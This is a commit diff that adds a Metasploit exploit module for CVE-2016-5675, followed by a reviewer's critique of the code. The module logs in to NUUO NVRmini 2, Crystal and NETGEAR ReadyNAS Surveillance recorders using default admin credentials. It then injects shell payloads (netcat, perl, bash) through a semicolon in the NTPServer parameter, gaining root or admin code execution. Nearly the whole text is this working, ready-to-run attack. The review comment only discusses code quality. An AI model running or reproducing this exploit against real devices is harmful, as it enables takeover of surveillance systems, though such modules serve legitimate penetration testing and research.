
add exploit for CVE 2016-5675

Pedro Ribeiro 3 years ago
parent
commit
0deac80d61
1 changed files with 178 additions and 0 deletions
  1. 178
    0
      modules/exploits/linux/http/nuuo_nvrmini_auth_rce.rb

+ 178
- 0
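--- a/modules/exploits/linux/http/nuuo_nvrmini_auth_rce.rb
+++ b/modules/exploits/linux/http/nuuo_nvrmini_auth_rce.rb
@@ -0,0 +1,178 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+# - test v_web_login_login_type string in NVRmini
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'NUUO NVRmini 2 / Crystal / NETGEAR ReadyNAS Surveillance Authenticated Remote Code Execution',
+      'Description' => %q{
+        The NVRmini 2 Network Video Recorder, Crystal NVR and the ReadyNAS Surveillance application are vulnerable
+        to an authenticated remote code execution on the exposed web administration interface. An administrative
+        account is needed to exploit this vulnerability.
+        This results in code execution as root in the NVRmini and the 'admin' user in ReadyNAS.
+        This exploit has been tested on several versions of the NVRmini 2, Crystal and the ReadyNAS Surveillance.
+        It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
+        in those devices.
+      },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2016-5675'],
+          ['US-CERT-VU', '856152'],
+          ['URL', 'TODO_GITHUB_URL'],
+          ['URL', 'TODO_FULLDISC_URL']
+        ],
+      'DefaultOptions' => { 'WfsDelay' => 5 },
+      'Platform' => 'unix',
+      'Arch' => ARCH_CMD,
+      'Privileged' => false,  # Runs as root in NVRmini 2 / Crystal, admin in ReadyNas
+      'Targets' =>
+        [
+          [ 'Automatic', { } ],
+          [ 'NUUO NVRmini 2', {
+            'Payload' =>
+              {
+                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
+                'DisableNops' => true,
+                'Compat'      =>
+                  {
+                    'PayloadType' => 'cmd',
+                    'RequiredCmd' => 'netcat generic perl'
+                  }
+              },
+          }],
+          [ 'ReadyNAS NETGEAR Surveillance', {
+            'Payload' =>
+              {
+                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
+                'DisableNops' => true,
+                'Compat'      =>
+                  {
+                    'PayloadType' => 'cmd',
+                    'RequiredCmd' => 'netcat generic perl'
+                  }
+              },
+          }],
+          [ 'NUUO Crystal', {
+            'Payload' =>
+              {
+                'Space' => 1024,    # Actually it might be the GET request length, but this is a safe value
+                'DisableNops' => true,
+                'Compat'      =>
+                  {
+                    'PayloadType' => 'cmd',
+                    'RequiredCmd' => 'bash'
+                  }
+              },
+          }],
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Aug 4 2016'))
+
+    register_options(
+      [
+        Opt::RPORT(8081),
+        OptString.new('TARGETURI', [true,  "Application path", '/']),
+        OptString.new('USERNAME', [true, 'The username to login as', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password for the specified username', 'admin']),
+      ], self.class)
+  end
+
+
+  def id_target
+    return target if target.name != 'Automatic'
+    res = send_request_cgi({
+      'uri' => normalize_uri(datastore['TARGETURI'])
+    })
+    if res && res.code == 200
+      if res.body.to_s =~ /var VENDOR_NAME = "Netgear";/
+        print_status("#{peer} - Identified NETGEAR ReadyNAS Surveillance as the target.")
+        return targets[2]
+      elsif res.body.to_s =~ /v_web_login_login_type/
+        print_status("#{peer} - Identified NUUO Crystal as the target.")
+        return targets[3]
+      else
+        print_status("#{peer} - Identified NUUO NVRMini 2 as the target.")
+        return targets[1]
+      end
+    end
+  end
+
+
+  def exploit
+    res = send_request_cgi({
+            'method' => 'POST',
+            'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
+            'vars_post' => {
+              'user' => datastore['USERNAME'],
+              'pass' => datastore['PASSWORD'],
+              'submit' => "Login"
+            }
+        })
+
+    if res && (res.code == 200 || res.code == 302)
+      cookie = res.get_cookies
+    else
+      fail_with(Failure::Unknown, "#{peer} - Failed to log in with the provided credentials.")
+    end
+
+    my_target = id_target
+    if my_target == targets[1]
+      if payload.raw.include?("perl")
+        fail_with(Failure::Unknown, "The NVRmini 2 only supports generic or netcat payloads.")
+      end
+      print_status("#{peer} - Executing payload...")
+      send_request_cgi({
+          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
+          'cookie' => cookie,
+          'vars_get' => {
+            'act' => "update",
+            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.encoded
+          }
+        }, 1)
+    elsif my_target == targets[2]
+      if payload.raw.include?("netcat")
+        fail_with(Failure::Unknown, "ReadyNAS Surveillance does not support netcat payloads.")
+      end
+      # We also have to fix the perl payload - there's an IO import error on the ReadyNAS that blows
+      # it up.
+      print_status("#{peer} - Executing payload...")
+      send_request_cgi({
+          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
+          'cookie' => cookie,
+          'vars_get' => {
+            'act' => "update",
+            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw.gsub("-MIO ", "-MIO::Socket ")
+          }
+        }, 1)
+    else
+      if not payload.raw.include?("exec")
+        fail_with(Failure::Unknown, "NUUO Crystal only supports bash payloads.")
+      end
+      print_status("#{peer} - Executing payload...")
+      send_request_cgi({
+          'uri' => normalize_uri(datastore['TARGETURI'], "handle_daylightsaving.php"),
+          'cookie' => cookie,
+          'vars_get' => {
+            'act' => "update",
+            'NTPServer' => rand_text_alpha(12 + rand(8)) + ";" + payload.raw
+          }
+        }, 1)
+    end
+    handler
+  end
+end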
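Review bot: The login check in `exploit` accepts any 200 or 302 from login.php as a successful authentication, so if the device answers a wrong password with a 200 and the login form again (likely, though not verifiable from this hunk) the module carries on with whatever cookies it received and the "Failed to log in" message is never reached; inspecting the body for the logged-in page, or at minimum rejecting an empty cookie jar with `fail_with(Failure::NoAccess, "#{peer} - Failed to log in with the provided credentials.") if cookie.to_s.empty?`, would surface that. In the same way `id_target` returns nil whenever the fingerprint probe is not a 200, and the trailing `else` branch then silently fires the Crystal bash payload at an unidentified host; adding `fail_with(Failure::NotFound, "#{peer} - Could not identify the target, please set it manually.") unless my_target` right after `my_target = id_target` closes that gap, and the payload-compat rejections are better reported as `Failure::BadConfig` than `Failure::Unknown`. The `'URL'` references still hold the `TODO_GITHUB_URL` and `TODO_FULLDISC_URL` placeholders and should be filled in or removed before this lands, and `'Privileged' => false` contradicts the inline comment that the NVRmini 2 and Crystal run the payload as root.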
